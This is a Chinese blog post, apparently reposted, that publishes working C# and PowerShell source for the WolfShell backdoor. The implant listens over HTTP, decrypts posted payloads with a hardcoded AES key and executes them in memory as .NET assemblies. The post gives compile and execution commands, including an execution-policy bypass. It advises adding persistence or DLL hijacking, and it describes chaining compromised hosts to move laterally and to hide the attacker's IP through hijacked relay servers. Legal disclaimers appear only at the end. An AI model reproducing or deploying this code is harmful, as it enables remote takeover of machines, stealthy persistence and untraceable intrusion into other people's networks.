文章总结： 文档介绍WolfShell正向马的C#与PowerShell实现代码，通过HTTP监听实现级联控制内网多台主机，支持端口复用和持久化。关键功能包括横向渗透、多层网络跳板规避追踪，提供编译执行方法和免责声明。 综合评分： 76 文章分类： 内网渗透,红队,安全工具,渗透测试,WEB安全

WolfShell 正向马 级联功能 横行内网

金刚狼 金刚狼

金刚狼不懂安全

2026年5月7日 21:58 中国香港

在小说阅读器读本章

去阅读

金刚狼 正向马 c# & powershell 代码

之前有人说金刚狼集成了许多没用的渗透工具——像那类成堆的信息收集比如god、截屏功能，以及一些只对个人电脑有用的小工具。针对服务器上的 webshell，很多功能确实多余，甚至会运行报错。但别忘了，金刚狼也能用来控制个人终端：它并非只是为操控内网 webshell 而设计的级联功能，其最初目的就是在内网中横向扩展、横行各主机。若无法横行内网，那级联功能将无意义。

exe版正向马

using System;
using System.IO;
using System.Net;
using System.Text;
using System.Security.Cryptography;
using System.Reflection;

namespacewolfshell
{
    classProgram
    {
        static void Main(string[] args)
        {
            string url = "http://+:8080/wolfshell/";
            using (HttpListener listener = new HttpListener())
            {
                listener.Prefixes.Add(url);
                listener.Start();
                while (true)
                {
                    try
                    {
                        HttpListenerContext context = listener.GetContext();
                        byte[] k = Encoding.Default.GetBytes("ca63457538b9b1e0");
                        if (context.Request.Cookies.Count != 0)
                        {
                            MemoryStream ms = new MemoryStream();
                            context.Request.InputStream.CopyTo(ms);
                            byte[] c = ms.ToArray();
                            if (c.Length > 0)
                            {
                                RijndaelManaged rm = new RijndaelManaged();
                                byte[] d = rm.CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length);
                                Assembly.Load(d).CreateInstance("K").Equals(context);
                            }
                        }
                        context.Response.StatusCode = 200;
                        context.Response.Close();
                    }
                    catch { }
                }
            }
        }
    }
}

编译EXE

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:wolf.exe wolf.cs

执行exe

命令行或直接双击wolf.exe即可

PS：可自行修改，添加启动项，实现持久化，结合级联功能，内网横行。 也可以根据该代码修改成DLL，通过DLL劫持级联控制内网多台机器。

PowerShell版 正向马

$l = New-Object System.Net.HttpListener
$l.Prefixes.Add("http://+:8080/wolfshell/")
$l.Start()

while ($l.IsListening) {
    $c = $l.GetContext()
    $q = $c.Request
    $s = $c.Response

    try {
        if ($q.Cookies.Count -ne 0) {
            $k = [System.Text.Encoding]::Default.GetBytes("ca63457538b9b1e0")
            $i = $q.InputStream
            $b = New-Object byte[] $q.ContentLength64
            $i.Read($b, 0, $b.Length)

            $r = New-Object System.Security.Cryptography.RijndaelManaged
            $d = $r.CreateDecryptor($k, $k)
            $f = $d.TransformFinalBlock($b, 0, $b.Length)

            $a = [System.Reflection.Assembly]::Load($f)
            $o = $a.CreateInstance("K")
            $o.Equals($c)
        }
        $s.StatusCode = 200
    } catch {
        $s.StatusCode = 500
    } finally {
        $s.Close()
    }
}

运行PowerShell正向马

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File wolf.ps1

连接正向马

添加shell:  http://192.168.50.69:8080/wolfshell

IIS端口复用

若目标存在IIS，不管是PowerShell还是exe版，均支持端口复用

级联功能  目前支持cmd&powershell

级联内网第3层WebShell 执行Cmd命令

通过入口点 192.168.50.106 级联内网 192.168.50.159 再次级联下一层内网 192.168.50.69 WebShell 执行命令

PS: 当然也可级联外网，比如抓了一些服务器当跳板，真正要搞的目标在第3层，这样就很难被追踪或溯源到你的真实IP了

级联内网第2层WebShell 执行Cmd命令

通过入口点 192.168.50.159 级联内网 192.168.50.106 WebShell执行命令

免责声明

使用WolfShell时，请遵循相关法律法规，确保在授权的环境中进行测试和使用。
本工具仅供教育和研究目的，任何滥用行为将由用户自行承担后果。

金刚狼下载：https://github.com/0x7556/wolfshell

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：金刚狼不懂安全 金刚狼 金刚狼《WolfShell 正向马 级联功能 横行内网》